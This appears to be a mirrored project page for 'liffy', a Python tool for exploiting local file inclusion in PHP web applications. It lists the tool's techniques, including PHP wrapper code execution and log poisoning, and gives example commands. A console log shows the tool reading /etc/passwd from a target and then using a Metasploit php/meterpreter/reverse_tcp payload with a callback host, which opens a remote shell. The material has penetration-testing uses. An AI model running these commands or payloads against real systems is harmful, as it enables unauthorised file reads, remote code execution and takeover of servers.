GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → hvqzao → liffy

hvqzao / liffy

Licence: GPL-2.0 license
Local File Inclusion Exploitation Tool (mirror)

Programming Languages

python
139335 projects - #7 most used programming language

Liffy

Liffy is a Local File Inclusion Exploitation tool.

Current features include:

  • data:// for code execution
  • expect:// for code execution
  • input:// for code execution
  • filter:// for arbitrary file reads
  • /proc/self/environ for code execution in CGI mode
  • Apache access.log poisoning
  • Linux auth.log SSH poisoning
  • Direct payload delivery with no stager
  • Support for absolute and relative paths
  • Support for cookies

! I have had issues with access log poisoning on current versions of Apache. This not an issue with the payload delivery and or poisoning. This is more of an issue with the request after the poisoning to kick off your shell. This may require a browser refresh. !

Install

Liffy requires the following libraries: requests, argparse, blessings, urlparse, daemon

Update - Liffy now has built-in web serving functionality for all techniques that use the staged approach. This is built upon Python's simpleHTTPServer module, and is being daemonized once spawned as a process within core.py. I have had some issues with socket reuse and the child process not being killed correctly, so QA would be appreciated, and or suggestions on how to design it better.

Example Usage

./liffy --url http://target/pdfs/vulnerable.php?= --data
./liffy --url http://target/pdfs/vulnerable.php?= --data --nostager



ruckus:liffy rotlogix$ python liffy.py --url http://10.0.0.11/vuln/lfi.php?file= --filter


    .____    .__  _____  _____
    |    |   |__|/ ____\/ ____\__.__.
    |    |   |  \   __\   __<   |  |
    |    |___|  ||  |   |  |  \___  |
    |_______ \__||__|   |__|  / ____| v1.2
        \/                \/


[2014-08-03 19:36:33.002626] Checking Target: http://10.0.0.11/vuln/lfi.php?file=
[2014-08-03 19:36:33.002722] ......................................................................
[2014-08-03 19:36:33.791168] Target URL Looks Good!
[2014-08-03 19:36:33.791210] Filter Technique Selected!
[2014-08-03 19:36:33.791336] Please Enter File To Read: /etc/passwd
[2014-08-03 19:36:38.319685] Decoded: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-
data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-
Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false mysql:x:102:105:MySQL
Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin



    .____    .__  _____  _____
    |    |   |__|/ ____\/ ____\__.__.
    |    |   |  \   __\   __<   |  |
    |    |___|  ||  |   |  |  \___  |
    |_______ \__||__|   |__|  / ____| v1.2
        \/                \/


[2014-08-03 19:39:33.674202] Checking Target: http://10.0.0.11/vuln/lfi.php?file=
[2014-08-03 19:39:33.674297] ......................................................................
[2014-08-03 19:39:34.454758] Target URL Looks Good!
[2014-08-03 19:39:34.454795] Data Technique Selected!
[2014-08-03 19:39:34.454877] Please Enter Host For Callbacks: 10.0.0.4
[2014-08-03 19:39:37.112427] Please Enter Port For Callbacks: 6666
[2014-08-03 19:39:38.597878] Generating Wrapper
[2014-08-03 19:39:38.597955] ......................................................................
[2014-08-03 19:39:39.347935] Success!
[2014-08-03 19:39:39.348007] Generating Metasploit Payload
[2014-08-03 19:39:39.348059] ......................................................................
[2014-08-03 19:39:46.289658] Generated Metasploit Resource File
[2014-08-03 19:39:46.289704] Load Metasploit: msfconsole -r php_listener.rc
[2014-08-03 19:39:46.289734] Starting Web Server ...
[2014-08-03 19:39:46.289750] ......................................................................
[2014-08-03 19:39:47.049321] Press Enter To Continue When Your Metasploit Handler is Running ...


[*] Processing php_listener.rc for ERB directives.
resource (php_listener.rc)> use multi/handler
resource (php_listener.rc)> set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (php_listener.rc)> set LHOST 10.0.0.4
LHOST => 10.0.0.4
resource (php_listener.rc)> set LPORT 6666
LPORT => 6666
resource (php_listener.rc)> set ExitOnSession false
ExitOnSession => false
resource (php_listener.rc)> exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.0.4:6666
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (40551 bytes) to 10.0.0.11
[*] Meterpreter session 1 opened (10.0.0.4:6666 -> 10.0.0.11:52410) at 2014-08-03 19:40:39 -0700
msf exploit(handler) >

Sidenote

Original release repository https://github.com/rotlogix/liffy is no longer available.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].